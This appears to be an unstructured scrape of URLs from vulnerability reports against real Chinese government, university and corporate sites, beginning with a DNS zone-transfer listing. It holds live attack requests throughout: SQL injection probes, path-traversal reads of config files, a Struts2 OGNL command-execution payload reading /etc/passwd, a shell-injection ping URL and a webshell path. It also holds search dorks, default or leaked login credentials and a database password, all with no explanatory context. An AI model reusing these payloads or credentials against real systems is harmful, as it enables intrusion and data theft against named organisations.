zone_server:42.62.41.195 name:xeonphenom.newsmth.net address:60.2.251.6 zone_server:42.62.41.195 name:xeonphenom.newsmth.net address:60.2.251.7 zone_server:42.62.41.195 name:xeonphenom.newsmth.net address:123.126.93.162 zone_server:42.62.41.195 name:xeon.newsmth.net address:60.2.251.7 zone_server:42.62.41.195 name:military.newsmth.net address:60.2.251.32 zone_server:42.62.41.195 name:conroe.newsmth.net address:111.13.26.2 zone_server:42.62.41.195 name:lynn.newsmth.net address:123.126.93.169 zone_server:42.62.41.195 name:sandy.newsmth.net address:123.126.93.163 zone_server:42.62.41.195 name:ivy.newsmth.net address:123.126.93.168 zone_server:42.62.41.195 name:duron.newsmth.net address:123.126.93.166 zone_server:42.62.41.195 name:tee.newsmth.net address:123.126.93.182 zone_server:42.62.41.195 name:ns1.newsmth.net address:42.62.41.195 zone_server:42.62.41.195 name:chinaops.newsmth.net address:211.154.239.253 zone_server:42.62.41.195 name:chinaops.newsmth.net address:211.154.239.254 zone_server:42.62.41.195 name:westmere.newsmth.net address:111.13.26.1 zone_server:42.62.41.195 name:karaoke.newsmth.net address:123.126.93.180 zone_server:42.62.41.195 name:prescott.newsmth.net address:123.126.93.170 http://nj.focus.cn/dmc/houseprice_show.php?house_id=905,参数house_id http://nj.focus.cn/dmc/houseprice_show.php?house_id=905%27%20and%20%271%27=%271 http://nj.focus.cn/dmc/houseprice_show.php?house_id=905%27%20and%20%271%27=%27111111,1=111111,返回异常 http://zph.veryeast.cn/call/meeting_prediction.asp?provinceId=4 http://www.yqinfo.cn/ http://oa.yunquanoa.com:8800/ http://charity.chinapay.com/ http://charity.chinapay.com/admin/system/index.php http://www.haust.edu.cn/news/detaila.asp?id=43166 http://www.acme-soft.cn/ inurl:WebUI/Article_Show.aspx http://www.jxxqgsgl.com/WebUI/Article_Show.aspx?DocID=T201111231558085810000194 http://www.wygsgl.com:9191/WebUI/Article_Show.aspx?DocID=T201407250944374710000194 http://jfgs.jxjtzx.com:9494/WebUI/Article_Show.aspx?DocID=T201406051854485510000375 http://www.jxgsgl.com/WebUI/Article_Show.aspx?DocID=T201406200805416510000738 http://www.jxphgs.com/WebUI/Article_Show.aspx?DocID=T201312301954321010001350 http://www.zoksoft.com/wangzhananli/ http://www.yestehotel.com/ http://www.yestehotel.com/index.php/booking/pay.html?oid=10481 http://www.yestehotel.com/index.php/booking/pay.html?oid=10101 http://www.yestehotel.com/index.php/booking/pay.html?oid=10487 http://monitor.ncu.edu.cn/ http://flight.yestehotel.com/Flight/FlightSearch.asp http://www.sce.tsinghua.edu.cn/course/coursedetail.jsp?id=131 http://www.luoding.gov.cn/website/listpage/list.jsp?topid= http://www.jiajiao400.com/bj/profiles/zixundan http://www.jiajiao400.com/bj/profiles/zxdview?id=37053 http://demo.zoomla.cn/user/iServer/FiServerInfo.aspx?menu=filedown&filepath=//Config//ConnectionStrings.config http://demo.zoomla.cn/user/iServer/FiServer.aspx http://www.utt.com.cn/appexampleview.php?id=1104 http://www.utt.com.cn/appexampleview.php?id=1104 http://www.utt.com.cn/appexampleview.php?id=1104 http://www.utt.com.cn/appexampleview.php?id=1104 http://www.jxbh.cn/ http://zgjxod.com/aboutus.php?id=52 http://ytys1002.com/aboutus.php?id=3 http://www.91lingdu.com/AboutUs.php?showid=46 http://www.nctksy.com/aboutus.php?id=1 http://www.rfled.com/aboutus.php?showid=45 http://www.jxyh.net/aboutus.php?id=1 http://www.mingshunge.com/aboutus.php?id=52 http://www.jxzhzn.net/aboutus.php?id=55 http://www.jxshkx.net/aboutus.php?id=1 http://www.pldsec.com/index.php/Case/index/tpl/6 http://www.agrij.com/) inurl:login_form.jsp http://202.99.207.13:8081/finance11n/init/download_attach.jsp?id=-1 http://124.164.240.217:8080/finance03/init/download_attach.jsp?id=-1 http://111.12.148.194:7005/finance_qhld/init/download_attach.jsp?id=-1 http://61.185.74.147:8080/finance67/init/download_attach.jsp?id=-1 http://nat.nat123.net:11158/finance/init/download_attach.jsp?id=-1 http://www.cldwcwgk.gov.cn:8083/finance80/init/download_attach.jsp?id=-1 http://116.255.135.35:8082/finance_glx/init/download_attach.jsp?id=-1 http://221.131.81.143:7001/finance_oracle/init/download_attach.jsp?id=-1 http://111.12.148.194:7005/finance_qhld//init/download_attach.jsp?id=-1 http://124.164.240.217:8080/finance03//init/download_attach.jsp?id=-1 http://219.157.74.6:8080/finance/init/download_attach.jsp?id=-1 http://61.185.74.147:8080/finance67/init/download_attach.jsp?id=-1 http://116.255.135.35:8082/finance_glx/init/download_attach.jsp?id=-1 site:kouclo.com http://www.sxrt.gov.cn/soso.aspx?p=1&title=Mr.&type=2 http://wooyun.org/bugs/wooyun-2010-045840找到了厦航的第一个ip段,然后进行80与8080端口检测,发现了一个dmz的登陆以及几个深信服的管理页面跟CISCO的防火墙登陆页面,尝试了深信服的命令执行漏洞未果。将目光转到了web端。最终将目标放在了hr.xiamenair.com.cn,注册用户以后开始全局测试,找了一会儿看到了一个找回密码。对于sql注入我本以为是没有的,想找个逻辑漏洞,在点击找回密码以后,通过抓包看到了 http://hr.xiamenair.com.cn/ashx/Person/Password.ashx?action=PasswordReset&User_Login_Name=xxxxx&User_Name=xxxxxx http://www.ssbz.gov.cn/web/repertory_gr.jsp?sub_repertory_type_id=21 http://www.ssbz.gov.cn/web/repertory_gr.jsp?sub_repertory_type_id=21 http://map.beihai.gov.cn/edit/up_only_address.asp?formname=form1&editname=pic&uppath=upload/news&filelx=jpg http://bbs-mall.chinapay.com/ http://bbs-mall.chinapay.com/config.inc.php.bak http://hayonggu.cn.99114.com/ProductList.shtml?c=101 http://www.wangxuankj.com/IndexAction.do http://www.fzjsqqy.cn/eyesplay/vPlay.aspx http://www.douban.com/contacts/find http://10.10.10.1/message_add.html url:http://124.225.113.73:8080/manager/html user:admin pass:admin http://blog.fang.com/blogweb/blog_manage/gratulate.aspx http://icp.sundns.com/testphp/testphp.php?start_item=28960 http://www.hbhk.com.cn/index.action inurl:zsgl/bswb/ http://yjsy.cqmu.edu.cn:8080/zsgl/bswb/bscjcx.aspx http://202.119.84.62/zs/lqgl/zs_ssxscx.aspx http://yjsb.kmmc.cn/zs/bswb/bscjcx.aspx http://yjs.htu.edu.cn/zsgl/bswb/bscjcx.aspx http://www.cupta.net.cn/ http://www.pantosoft.com/pantogj/Module/XT/FileUploader/DownLoadFile.aspx?f=/web.config http://www.pantosoft.com/pantoxfz/Module/XT/FileUploader/DownLoadFile.aspx?f=/web.config http://61.181.88.59/Module/XT/FileUploader/DownLoadFile.aspx?f=/web.config http://58.210.204.245/Module/XT/FileUploader/DownLoadFile.aspx?f=/web.config http://www.vszhh.pudong-edu.sh.cn/pantoschool/Module/XT/FileUploader/DownLoadFile.aspx?f=/web.config http://www.xzzz.cn/pantoschool/Module/XT/FileUploader/DownLoadFile.aspx?f=/web.config http://www.scp.edu.cn:8600/Module/XT/FileUploader/DownLoadFile.aspx?f=/web.config http://www.gxjdgyxx.com:8300/Module/XT/FileUploader/DownLoadFile.aspx?f=/web.config http://oa.qyzx.mhedu.sh.cn/Module/XT/FileUploader/DownLoadFile.aspx?f=/web.config http://www.cyzjdd.com:7000/Module/XT/FileUploader/DownLoadFile.aspx?f=/web.config http://www.zqnx.com:20000/Module/XT/FileUploader/DownLoadFile.aspx?f=/web.config http://cd.ntjx.org/Module/XT/FileUploader/DownLoadFile.aspx?f=/web.config http://www.blogbus.com/search/3'/tags http://xxxx.blogbus.com/user/js/calendar2.js/1.php http://dongling.cn.99114.com/AlbumList.shtml?c=101 http://mobile.9158.com/ http://**.**.**.**/newslist-con.php?id=30 http://**.**.**.**/lcchen/hj_content.php?id=13014&code=003004010002 http://**.**.**.**/newslist-con.php?id=30 http://**.**.**.**/ http://dlyanshen.cn.99114.com/AlbumList.shtml?c=101 http://admin.dooland.com/test/news/install.php http://admin.dooland.com/test/news/config.inc.php.bak http://im.umetrip.com/admin/index.php http://www.eqjn.cn/d.aspx http://xtj.dajie.com/wx/xtj/103/referee/scan?tmpId=170723页面的tmpId参数可跳转到他人页面,如下图: http://www.csks.gov.cn/csjsj/webregister/index.aspx http://www.wisedu.com/ http://fly.piao.com.cn/ http://www.zjloomax.com/sccms/ http://www.cnlxljl.com/sccms/ http://ky3x.net/sccms/ http://www.pysyzx.net/ http://muagent-hk.ceair.com/test/a/user_detail.aspx?usrId=0003 http://muagent-hk.ceair.com/test/a/user_detail.a http://sqlmap.org http://www.cmipc.org/1.txt inurl:/ws2004/ http://222.33.81.31:8080/NCSS2/jetsennet/ncss/appmanage/login!login.action url:http://222.33.81.31:8080/manager/html user:admin pass:123456 http://222.33.81.31:8080/NCSS2/ getwebshell:http://mail.qjxgold.com/shell.asp http://mail.qjxgold.com/NewFile.txt http://blog.fang.com/50048490/blogcommentlist.htm#go209039 http://jiaowu.nwsuaf.edu.cn http://service.weibo.com/share/share.php?url=http://admin.weibo.com&appkey=&title=&pic=&ralateUid=&language= http://demo.zoomla.cn/app/addTemplate.aspx后台管理,应用推送添加模板处。 http://hzp.rayli.com.cn/tryapply/tryreportlist/?tryid=880 http://ise.ujn.edu.cn/isenews/echobin.php?id=627 site:pigai.org inurl:eid site:pigai.org http://vote.pigai.org/Home/index.php?s=/Qa/index/id/33 http://www.nitc.cc/ http://demo.nitc.cc/ http://demo.cnnitc.com/statistics.php http://www.xiantao.jcy.gov.cn/xtjcyadmin/index.php http://iask.finance.sina.com.cn/b/18834257.html http://www.qysi.gov.cn/websys/jsp/website/personquery/personbase.jsp?AAC002=身份证号码&AAC001=2000122411 http://www.qysi.gov.cn/jsp/website/personquery/personbase.jsp?AAC001=2000122411 http://www.qysi.gov.cn/jsp/website/personquery/personbase.jsp?AAC001=2000122411 http://www.qysi.gov.cn/jsp/website/personquery/personbase.jsp?AAC001=2000122411 http://www.qysi.gov.cn/jsp/website/personquery/personbase.jsp?AAC001=2000122411 http://www.qysi.gov.cn/jsp/website/personquery/personbase.jsp?AAC001=2000122411 http://www.qysi.gov.cn/jsp/website/personquery/personbase.jsp?AAC001=2000122411 https://szfesc.cn/ http://www.shashi.gov.cn/bocai/yulecheng/index.html http://www.xjbljj.gov.cn/data/r5ha/yBuHq/Ker/ http://yulecheng.hnmaotian.gov.cn/ http://www.zjjjs.gov.cn/bc/bjbylc/ http://www.tl.gov.cn/art/art_40_4838.html http://www.cyx.gov.cn/ http://www.wjinvest.gov.cn/en/yongliyulechengdubo/index.asp http://www.hdsqjy.gov.cn/tgs/index.html http://www.comic.gov.cn/picture/zrdxn/html/news/470.htm http://www.bzly.gov.cn/admin/FCKeditor/editor/ylc/myitea/ http://www.hllinkou.gov.cn/baijile/ http://www.jdzedu.gov.cn/edit/dialog/aibodi/bogouyulecheng/index.asp site:gov.cn shopbuilder:www.shop-builder.cn http://atc.seu.edu.cn/manage/PicNewsShow.asp?id=1 http://www.rxwzjs.com/ inurl://News/view/id/12.html http://www.anypas.com/News/view/id/190*.html http://www.sqlmap.org www.anypas.co http://qq.api.10jing.com/index.php?act=guideapi.getCitySummary&guideid=4242&deviceType=5&platform=android https://yktj.gov.cn/phpmyadmin/ http://www.doyouhike.net/user/1147140 http://www.ttkdex.com/ttkdweb/serviceguide/guestbook.html http://www.jiajiao114.com/ http://ac.qfkd.com.cn/ http://wxy.hqu.edu.cn/hqdx/xyxwx.asp?id=347 http://www.gzife.edu.cn/portal http://portal.gzife.edu.cn/eapdomain/static/component/cms/cmp_cms_pim_show/showInfoDetail_home.jsp?infoId=56415&config_id=23366 http://portal.ruc.edu.cn/eapdomain/static/component/cms/cmp_cms_pim_show/showInfoDetail.jsp?infoId=6377&config_id=5168 http://info.pumc.edu.cn/eapdomain/static/component/cms/cmp_cms_pim_show/showInfoDetail.jsp?infoId=11665&config_id=5039 http://portal.shfc.edu.cn/eapdomain/static/component/cms/cmp_cms_pim_show/showMoreInfoList.jsp?configId=15715 http://portal.cupes.edu.cn/eapdomain/static/component/cms/cmp_cms_pim_show/noteDetailShow.jsp?noteId=18896 http://info.btbu.edu.cn:8080/eapdomain/static/component/cms/cmp_cms_pim_show/infoList.jsp?ID=5586 http://xgb.uibe.edu.cn/eapdomain/static/component/cms/cmp_cms_pim_show/showInfoDetail.jsp?infoId=6227&config_id=8340 http://portal.dlut.edu.cn/eapdomain/static/component/cms/cmp_cms_pim_show/showFileInfo.jsp?infoId=306395&config_id=4747 http://portal.shisu.edu.cn/eapdomain/static/component/cms/cmp_cms_pim_show/showInfoDetail.jsp?infoId=27491&config_id=22088 inurl:/sm2005 http://**.**.**/JiangSu/systemsetting/userLogin.action http://218.94.1.82/ http://218.94.1.82/ data.zjepi.net/ZheJiang/systemsetting/userLogin.action_ cn:81/ShangRao/systemsetting/userLogin.action_ http://www.eduease.com/data.rar www.antasys.com http://antasys.3322.org:688/ http://antasys.3322.org:688/dgn/dgn_tools/ping.php?ipdm=127.0.0.1;ls&ps=64&cnt=1 http://antasys.3322.org:688//dgn/dgn_tools/cappkt.php http://antasys.3322.org:688//dgn/dgn_tools/tracert.php http://antasys.3322.org:688/doc/phpmy/index.php; inurl:bencandy http://union.skywldh.com/index.php/user/welcome http://www.sanya.gov.cn/publicfiles/business/htmlfiles/mastersite/cmsmedia/document/2012/10/doc9445.txt http://democn.mall-builder.com/ http://202.38.232.84/eresources/view.php?page=1&view=a&cata=%E7%94%B5%E5%AD%90%E5%9B%BE%E4%B9%A6&orderby=d_hits http://demo.zoomla.cn/User/Register.aspx http://demo.zoomla.cn/User/Login.aspx?ReturnUrl= http://demo.zoomla.cn/User/UserFriend/FriendSearch/Friend_quickSYResult.aspx http://wsbs.sihui.gov.cn:28017/ http://oa.xndxfz.com http://oa.bsyey.com http://oa.dhssx.com http://oa.bashu.com.cn http://www.cqxjwxx.com.cn http://ltzx.zhedu.net.cn http://www.wxzzyey.com http://ww1980.cqjjzx.com http://zqzx.mhedu.sh.cn http://www.czlcxx.com http://mhzx.mhedu.sh.cn http://www.cqjjzx.com http://www.whjksyxx.com http://218.4.82.234 http://www.thgz.net http://www.trxx.fxedu.cn http://www.jsgyve.com http://www.cqyc.com http://jsshrzx.com:8987 http://ptsunshine.cn http://www.nths.cn http://www.slyey.cn:89/slyey http://www.ysx.net.cn http://mqxx.mhedu.sh.cn http://58.214.27.195 http://www.sx-school.net http://bj50f.com:8080 http://222.191.250.185 http://www.xishan.net http://www.zcbgxx.net:81 http://222.190.122.226:2080 http://tk.cqbxzx.com http://219.153.125.109 http://www.bndjw.com http://www.xxx.net/webschool/inc/user_choose_stu.jsp http://www.goldmail.cn/product/bulletin/news_detail.php?ID=199 http://m.ch999.com/brandlist.aspx?cid=2 http://wooyun.org/bugs/wooyun-2014-068118 url:http://oa.hbzyy.org/email/lookemail.asp?id=18230 http://www.juesheng.com/zhuanti/aodaliyatouziyimin http://www.juesheng.c http://sqlmap.org http://www.nitc.cc/ http://demo.nitc.cc/ http://www.cnnitc.com/ http://test.nitc.cc/ http://demo.cnnitc.com/office/backdb/2014-08-05-173036.php http://www.snciq.gov.cn/ http://www.snciq.gov.cn:6198/car/login.action http://www.chinawebber.com/,还烦请cncert国家互联网应急中心检测一下其他站点是否存在该漏洞。 http://jxt.tuntron.com/ http://www.wdaac.cn/login/index.aspx http://mydns3.xinnet.com http://www.ahsj.gov.cn/ http://www.ahsj.gov.cn/search.htm http://music.google.cn/search?newwindow=1&q=infoms%2Fidentity%2Findex.c&btnG=Google+%E6%90%9C%E7%B4%A2 http://220.178.0.180/infoms/identity/index.c http://218.76.27.109/infoms/identity/index.c http://aid.ec.js.edu.cn/infoms/identity/index.c http://202.119.175.107/infoms/identity/index.c http://58.213.129.204/infoms/ http://listen.kekenet.com/public.php?la_id=7801 inurl:/ws2004/ inurl:/vc2003/login/ inurl:/sm2005 inurl:/SM2005/ http://www.***.com/SM2005/public/WebEditor/upload.asp?action=save&type=IMAGE&style=luoye http://edu.chanjet.com/phpmyadmin/ http://edu.chanjet.com/a.php http://edu.chanjet.com/1.txt http://oa.xndxfz.com http://oa.bsyey.com http://oa.dhssx.com http://oa.bashu.com.cn http://www.cqxjwxx.com.cn http://ltzx.zhedu.net.cn http://www.wxzzyey.com http://ww1980.cqjjzx.com http://zqzx.mhedu.sh.cn http://www.czlcxx.com http://mhzx.mhedu.sh.cn http://www.cqjjzx.com http://www.whjksyxx.com http://218.4.82.234 http://www.thgz.net http://www.trxx.fxedu.cn http://www.jsgyve.com http://www.cqyc.com http://jsshrzx.com:8987 http://ptsunshine.cn http://www.nths.cn http://www.slyey.cn:89/slyey http://www.ysx.net.cn http://mqxx.mhedu.sh.cn http://58.214.27.195 http://www.sx-school.net http://bj50f.com:8080 http://222.191.250.185 http://www.xishan.net http://www.zcbgxx.net:81 http://222.190.122.226:2080 http://tk.cqbxzx.com http://219.153.125.109 http://www.bndjw.com http://www.jsgyve.com:80/webschool/ www.jsgyve.com http://survey.dianping.com/ http://demo.zoomla.cn/User/login.aspx demo.zoomla.cn/User/UserZone/AddStructure.aspx http://www.lenovostoreapp.com/ http://www.lenovostoreapp.com/admin/index.php http://www.lenovodm.cn/ www.lenovodm.cn/frontoperation.rar http://med.hunnu.edu.cn/news/admin/news.asp?id=2145 http://demo.zoomla.cn/User/login.aspx http://demo.zoomla.cn/User/PrintServer/Project/ProjectList.aspx http://www.sylr.gov.cn/upfile/wwwr/PresaleWindow.asp?allowsell_id=75 https://github.com/xdy2001/share.dp/tree/master/shareDP-web mysql://root:aix@rt#@192.168.6.233/DianPing?charset=utf8 mysql://root:aix@rt#@192.168.6.233/DianPing?charset=utf8 http://biz.finance.sina.com.cn/news_through/amore.php?date=2008-09-03&order=%20desc http://219.224.69.196/,登录后台验证不全,导致用户名密码均填入 http://www.wlxy.gxnu.edu.cn/show.asp?ArticleID=1276 username:wlxy http://114.80.230.213/upload.php http://optools.anjuke.com/search.php?cityid=14 http://114.80.230.205/ http://www.meijialx.com/city-detail/class_id:36 http://192.168.1.200:8080/view/newsfind.action http://192.168.1.200:8080/news/newsIndex.jsp http://192.168.1.200:8080/view/newsfindByType.action http://192.168.1.200:8080/notice/noticefind.action http://192.168.1.200:8080/noticeRecipient/noticeRecipientfind.action http://192.168.1.200:8080/user/expertfind.action http://192.168.1.200:8080/user/vExpertviewFind.action http://drops.wooyun.org/papers/548 http://cp.g.candou.com/ lylm.hnatu.com/Voyage.aspx?void=34 www.gsjszj.gov.cn/yqsb/viewhuifu.asp?info_id=16217 http://www.sxqx.net:8080/csyb/Default.aspx?Stationnum=58453 http://www.sxqx.net:8080/zcdl/regist.asp http://www.sxgxbys.com/ http://www.sxgxbys.com/news/login.asp?id=9 http://www.ncer.cn/admin.do http://www.fabgou.com/index.php?app=gcategory&cate_id=71 http://demo.zoomla.cn/USER/Develop%5CSiteAdmin/BackupSite.aspx http://www.cmaritime.com.cn http://www.cmaritime.com.cn http://www.cmaritime.com.cn/downfile.php?id=xxx http://www.cmaritime.com.cn/downfile.php?id=admin.php http://www.cmaritime.com.cn/downfile.php?id=/www/china/include/config.inc.php http://221.123.169.66:8080/ http://home.scnu.edu.cn/sfzx/project/lab_preview.php?lab_id=106&type=B http://club.hoau.net/COwebsite/login.do http://***.yunos.com/还存在其他安全问题: http://ct.ctrip.com/crptravel/index.aspx http://ct.ctrip.com/corptravel/mainpage.aspx inurl:/VOD2005 http://www.sh-cloud.com/ http://www.sh-cloud.com/indexToMessage.action?debug=command&expression=%23f=%23_memberAccess.getClass%28%29.getDeclaredField%28%27allowStaticMethodAccess%27%29,%23f.setAccessible%28true%29,%23f.set%28%23_memberAccess,true%29,%23req=@org.apache.struts2.ServletActionContext@getRequest%28%29,%23resp=@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29,%23a=%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27cat%27,%27/etc/passwd%27}%29%29.start%28%29,%23b=%23a.getInputStream%28%29,%23c=new%20java.io.InputStreamReader%28%23b%29,%23d=new%20java.io.BufferedReader%28%23c%29,%23e=new%20char[1000],%23d.read%28%23e%29,%23resp.println%28%23e%29,%23resp.close%28%29 http://www.sh-cloud.com/js/c.jsp http://1x.openwbs.com/ http://jwc.jnu.edu.cn/readnews.asp?id=2351&bigclassname=%BD%CC%CE%F1%B4%A6&smallclassname=%BF%CE%B3%CC%D6%D0%D0%C4&SpecialID=0 http://121.207.240.137:28017/serverStatus?text=1 http://121.207.240.137:28017 http://121.207.240.137:28017/_replSet http://lib.zzu.edu.cn/ArticleShow.aspx?aid=a2a59862-9f0b-47e9-adba-031a89d2da8e&sid=355dc7e7-f4c5-4ab7-a760-a30475ca55e6 http://oa.syc.com.cn/OA/index/index.aspx http://xinhuachongming.com.cn/DSOA_TY/index/index.aspx http://221.199.203.230:9001/dsoa/index/index.aspx http://180.166.56.106/dsoa/index/index0.aspx http://sd.tobacco.com.cn/dsoa_kgj_web/index/index0.aspx http://oa.syc.com.cn/oa/useradmin/index.aspx http://oa.syc.com.cn/oa/FCKeditor/editor/filemanager/connectors/asp/connector.asp http://oa.syc.com.cn/oa/useradmin/index.aspx http://www.ai6.com/ http://119.188.124.150/kefu/index.php?m=index&a=show&id=176&classid=163 http://course.xmu.edu.cn/meol/homepage/common/search_teacher_main.jsp http://www.suyaxing.com/ Google:inurl:/vodweb/affiche.asp http://www.frxinzhong.cn/vod2005/vodweb/affiche.asp?id=1 https://42.62.23.136/ user:root pass:calvin http://210.44.126.14/TASi/submitstep1.asp?action=master&lang=gb http://paper.sysu.edu.cn/TASi/submitstep1.asp?action=doctor&lang=gb https://***.alibaba-inc.com/ssoLogin.htm?APP_NAME=webmail&BACK_URL=https%3A%2F%2Fmail.alibaba-inc.com%2Falimail%2F&CANCEL_CERT=true&CONTEXT_PATH=%2Falimail%2F http://www.jajaa.cn/userSecurity/retrievePasswordTrend http://www.mama.cn/ask/q4457881-p1.html http://www.hisense.com) Ver:3.5.5 www.zte-s.cc http://www.ztetech.com.cn/ http://music.google.cn/search?newwindow=1&q=inurl%3Acomm_front&btnG=Google+%E6%90%9C%E7%B4%A2 http://www.chinacreator.com/ http://www.jetsum.com/ http://www.whldkjgs.com/upload.jsp?name=/WEB-INF/web.xml http://www.whxianggang.cn/upload.jsp?name=/WEB-INF/web.xml http://wetem.net.cn/upload.jsp?name=/WEB-INF/web.xml http://www.hbyl.gov.cn/upload.jsp?name=/WEB-INF/web.xml http://www.hbyfxxw.com/upload.jsp?name=/WEB-INF/web.xml http://wooyun.org/bugs/wooyun-2014-070716 http://www.wdaac.cn/Channel/TableDownLoadList.aspx?deptid=weihai393030 http://www.wdaac.cn/Bulletin/DocmentDownload.aspx?ID=10023 http://www.wdaac.cn/Bulletin/DocmentDownload.aspx?ID=10023 http://shenpi.qingdao.gov.cn/Bulletin/DocmentDownload.aspx?ID=15863 http://wsbs.bjft.gov.cn/ftww/Bulletin/DocmentDownload.aspx?ID=02713 http://xzfw.yunyang.gov.cn/Bulletin/DocmentDownload.aspx?ID=04104 http://www.5210.cn/Bulletin/DocmentDownload.aspx?ID=03361 http://www.cqspbxz.com/application/gzhd/bgxz/download.jsp?filename=WEB-INF/web.xml http://www.cqspbxz.com/application/gzhd/bgxz/download.jsp?filename=web-inf/classes/ http://www.flsp.cn/application/gzhd/bgxz/download.jsp?filename=WEB-INF/web.xml http://www.ddkspdt.com/application/gzhd/bgxz/download.jsp?filename=WEB-INF/web.xml http://61.186.175.242/application/gzhd/bgxz/download.jsp?filename=WEB-INF/web.xml http://61.128.175.37/application/wsbs/qyjmbsqiantai/download.jsp?filename=web-inf/web.xml http://music.google.cn/search?newwindow=1&q=inurl%3Acomm_front&btnG=Google+%E6%90%9C%E7%B4%A2 http://www.chinacreator.com/ https://svn.xml.so/svn/infdc http://q50launch.infiniti.com.cn/index.php/admin/login http://q50launch.infiniti.com.cn/js/kindeditor/php/Themes_template.php http://zbb.nankai.edu.cn/Views/tenderNewsContent.aspx?tenderNewsID=3884 https://vpn.yiwu.gov.cn/por/login_psw.csp?rnd=0.09960567764937878 http://www.mama.cn/ask/?g=Ucenter&uid=20631331 http://www.yongqi.com.cn/bgLogin.jsp http://www.spph-sx.com/ http://www.spph-sx.com/webedit/admin_uploadfile.asp?id=14&dir= http://www.spph-sx.com/webedit/admin_default.asp http://www.crca.cn/mojiyemian.jsp?digID=18&directoryid=18 http://www.rdjt.zjut.edu.cn/gvScript/xin http://www.chinapanda.org.cn/topic.php?id=33 http://hz.zhujia360.com/article/search/?keyword=1357919988 http://zzsme.zhangzhou.gov.cn/ http://zzsme.zhangzhou.gov.cn/index.php/News/detail/id/150 http://shipin.zhsfda.gov.cn/遵化食品安全监管平台 http://shipin.zhsfda.gov.cn/index.php/Admin/Tongzhi/chakan/tongzhiid/40 http://jx.10086.cn/www/cms/user_mbi.php?uid=1268648'&action=query&page_no=-19874&tran_code=&sdate=&edate= http://59.108.128.6:80/NGOSS/login.action http://demo.zoomla.cn/user/UserShop/OrderList.aspx?menu=souch&souchtable=&souchkey= http://qudian.pptv.com/ http://sfocs.sf-express.com/im-client/imclient/login.action?source=cn&goto2011=2011&hl=zh_CN http://www.bdwsj.gov.cn http://www.bdwsj.gov.cn/index.php/New/collist/colid/38 http://labs.chinamobile.com/report/reportArea/?cateid=1&i=24&sort=time http://www.meizu.com/services/questionContent.html?questionId=765093 http://998.21tb.com http://sp.ickey.cn/user/login.html http://61.178.40.9:7001/x3/ http://zzb.dahe.cn/fore/getCommentList.shtml?comManList.rticleNo=64169 http://elearning.hpe-online.com/hpe/login-HPE.jsp http://elearning.hpe-online.com/hpe/loginvalidation.action http://zpyc.bankofdl.com http://career.sdebank.com http://zhaopin.cnooc.com.cn www.biad.com.cn:88/ http://ehr.creditcard.cmbc.com.cn http://61.232.6.108/ inurl:hrss/login.jsp inurl:hrss/rm inurl:hrss/index.html http://zhaopin.cnooc.com.cn:80/ http://www.shaoxinghotel.com.cn/admin/ http://www.shaoxinghotel.com.cn/admin/aspcheck.asp www.shaoxinghotel.com.cn http://localhost/cmseasy/uploads/index.php?case=table&act=edit&table=user&id=1&admin_dir=admin&site=default http://www.rlzysc.gd.gov.cn/working.aspx?page=view&menu=2&d=25e http://url.cn/VNW1B5 http://share.weiyun.com/26ef1d114796fde0b5a32a9c1f90179f http://oa.515158.com/ http://www.sina.com.cn http://www.sina.com.cn http://www.yiliang.gov.cn/info.asp?id=1298&catid=6 http://bbs.home.chshcms.com/index.php/show/index/17 http://bbs.home.chshcms.com/index.php/show/index/17 http://zt.pusa123.com/ http://zt.pusa123.com/specialadmin_ccplusds2012abk01/login.php http://zt.pusa123.com/plus/flink.php inurl:riseapprove_web http://XXXX/riseapprove_web/secondPage/findWorkProceeding.do http://XXXX/riseapprove_web/sencondPage/moreResultFormula.do http://www.nazbcg.com/TSinNetCommons/download.do?id=B8121A0A-2D2D-40F4-9F3D-BCC50B7551BE http://www.nazjfw.com/NaZxGlxt/web/gonggao/tsxx.jsp?id=451591BD-D743-4BFB-B879-8F975ECF3661 http://www.jszbw.com/TSPB/web/zbgg/Content.jsp?pubGuid=3E49118DD8AAB0EBEF22BCB73E243576 http://www.jsspzx.gov.cn/JsWeb/news/ShowContent.jsp?infoId=69B0C570AE1FE9B32EBC2EB8150E35D1 http://spfwzx.zjwjj.gov.cn/wjjspfwzx/hnbanshi.jsp?spaRENTID=9D5C5C2B-F77F-486E-A808-9A13F00C112 http://60.12.186.79/TSPB/web/news/List.jsp?parentId=69E2EFF31C15466194E746A322465A94&PUBTYPE=7 http://www.nayqhq.com/NaYqHq/web/news/news_content.jsp?infoId=1D3E4D6A68891D32C5157DA8AB171119 http://www.jxedzsp.gov.cn/jxkfqglxt/web/news/news_content.jsp?infoId=EBFFF98F593CF4D2D2BC30086E38WWWW http://sa.cins.cn/v9.tar.gz http://sa.cins.cn/v9/目录下的 http://english.gzhu.edu.cn/newsdetail.aspx?id=80 http://txl.zjnu.edu.cn/class/class_index1.asp?classid=3000010007 http://download.discuz.net/Discuz/7.2/Discuz_7.2_SC_GBK.zip http://demo.zoomla.cn/guest/GuestShow.aspx?GID=1 http://demo.zoomla.cn/guest/GuestShow.aspx?GID=1 http://bbs.xunlei.com/home.php?mod=task&do=draw&id=7 http://api3.chepinhui.com/api.php/request http://www.51tek.com/category-199.html#top http://hqbzc.cug.edu.cn/old/shuidian/newsview.asp?fileid=11 http://kecheng.lut.cn/coursefile/gangjiegousheji_20090305/index.php?action=teacher&todo=infor&teacher_id=445 http://npe.hbtcm.edu.cn/coursefile/zhongyaopaozhixue_20110621/?action=teacher&todo=infor&teacher_id=330 http://gongxiang.51tek.com/coursefile/danpianjiyuanliyuyingyong_20100514/?action=teacher&todo=infor&teacher_id=80 http://jpkc.huanghuai.edu.cn/coursefile/sixiangdaodexiuyangyufalvjichu_20120330/index.php?action=teacher&todo=infor&teacher_id=410 http://jpkc.njtc.edu.cn/coursefile/jiexijihe_xiaoji__20090504/index.php?action=teacher&todo=infor&teacher_id=329 http://wyjpk.whu.edu.cn/kc/ces00/?action=teacher&todo=infor&teacher_id=115 http://jpk.tgc.edu.cn/coursefile/chayi_20090525/index.php?action=teacher&todo=infor&teacher_id=100 http://jpkc.jxbsu.com:8080/kc/mzgl/index.php?action=teacher&todo=infor&teacher_id=368 http://www.wandoujia.com/offlinepush/push?did=aea63ec6e44f4855b51e06e7ad290648f53c944a&title=%E6%90%9C%E7%8B%97%E6%89%8B%E6%9C%BA%E8%BE%93%E5%85%A5%E6%B3%95&url=http://apps.wandoujia.com/apps/com.sohu.inputmethod.sogou/download?pos=www/detail&versioncode=322&packagename=com.sohu.inputmethod.sogou Google:inurl:ListMore.aspx?ModuleID http://www.chengduair.cc http://www.chengduair.cc/Feedback.asp http://www.tjcoc.gov.cn/ 